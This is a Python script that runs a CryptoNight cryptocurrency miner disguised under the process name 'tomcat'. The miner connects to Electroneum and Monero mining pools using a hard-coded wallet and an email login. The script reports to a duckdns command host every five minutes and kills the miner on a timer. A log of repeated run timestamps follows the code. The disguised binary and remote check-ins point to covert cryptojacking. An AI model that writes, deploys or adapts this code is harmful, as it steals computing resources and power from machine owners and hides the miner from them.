import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:30:01.408534
#2018-02-17 17:17:06.826186
#2018-02-17 19:05:01.796997
#2018-02-17 20:52:07.753532
#2018-02-17 22:39:04.319356
#2018-02-18 00:22:06.199867
#2018-02-18 02:13:03.732132
#2018-02-18 04:00:01.567468
#2018-02-18 05:51:06.968492
#2018-02-18 07:42:01.519935
#2018-02-18 09:29:04.734649
#2018-02-18 11:16:06.644499
#2018-02-18 13:02:05.019402
#2018-02-18 14:51:04.744774
#2018-02-18 16:39:01.563958
#2018-02-18 18:28:01.278905
#2018-02-18 20:16:03.988210
#2018-02-18 22:01:03.994859
#2018-02-18 23:50:04.201492
#2018-02-19 01:37:04.124224
#2018-02-19 03:24:07.777479
#2018-02-19 05:09:06.578247
#2018-02-19 06:55:08.216021
#2018-02-19 08:44:07.652287
#2018-02-19 10:36:04.241389
#2018-02-19 12:23:07.673103
#2018-02-19 14:11:07.657417
#2018-02-19 16:01:01.318578
#2018-02-19 17:48:11.841392
#2018-02-19 19:34:04.946631
#2018-02-19 21:21:08.601599
#2018-02-19 23:07:03.851222
#2018-02-20 00:51:07.491533
#2018-02-20 02:40:08.667027
#2018-02-20 04:28:07.619344
#2018-02-20 06:13:08.140166
#2018-02-20 07:58:04.548654
#2018-02-20 09:43:07.910424
#2018-02-20 11:27:01.736346
#2018-02-20 13:14:06.075726
#2018-02-20 14:59:01.524882
#2018-02-20 16:45:13.324931
#2018-02-20 18:33:03.826620
#2018-02-20 20:24:08.614687
#2018-02-20 22:11:01.245181
#2018-02-20 23:53:02.322665
#2018-02-21 01:37:01.432100
#2018-02-21 03:24:04.214711
#2018-02-21 05:13:07.630098
#2018-02-21 07:02:01.283557
#2018-02-21 08:48:05.891424
#2018-02-21 10:36:08.715856
#2018-02-21 12:23:08.092565
#2018-02-21 14:11:04.470213
#2018-02-21 15:57:09.394842
#2018-02-21 17:49:07.071396
#2018-02-21 19:34:08.211942
#2018-02-21 21:21:01.958864
#2018-02-21 23:08:06.980728
#2018-02-22 00:55:08.149264
#2018-02-22 02:44:05.500216
#2018-02-22 04:31:03.344019
#2018-02-22 06:16:06.567868
#2018-02-22 08:02:04.204360
#2018-02-22 09:50:04.099003
#2018-02-22 11:35:09.105859
#2018-02-22 13:23:07.050381
#2018-02-22 15:12:08.980049
#2018-02-22 16:56:07.017110
#2018-02-22 18:43:10.262025
#2018-02-22 20:36:08.683869
#2018-02-22 22:21:02.135288
#2018-02-23 00:07:05.571480
#2018-02-23 01:55:03.759083
#2018-02-23 03:46:01.382170
#2018-02-23 05:31:03.440632
#2018-02-23 07:16:02.040309
#2018-02-23 09:21:05.881559
#2018-02-23 11:26:06.432359
#2018-02-23 13:17:05.219613
#2018-02-23 15:03:08.014014
#2018-02-23 16:52:05.966331
#2018-02-23 18:42:01.939802
#2018-02-23 20:29:06.639761
#2018-02-23 22:16:04.209718
#2018-02-24 00:01:06.866953
#2018-02-24 01:52:04.140551
#2018-02-24 03:46:05.471369
#2018-02-24 05:34:06.020648
#2018-02-24 07:20:03.855530
#2018-02-24 09:10:08.670522
#2018-02-24 11:06:01.941143
#2018-02-24 12:54:06.650758
#2018-02-24 14:42:07.396905
#2018-02-24 16:33:07.225829
#2018-02-24 18:23:04.970082
#2018-02-24 20:09:05.037829
#2018-02-24 21:53:03.650383
#2018-02-25 01:50:06.321563
#2018-02-25 04:51:06.394974
#2018-02-25 08:13:04.352989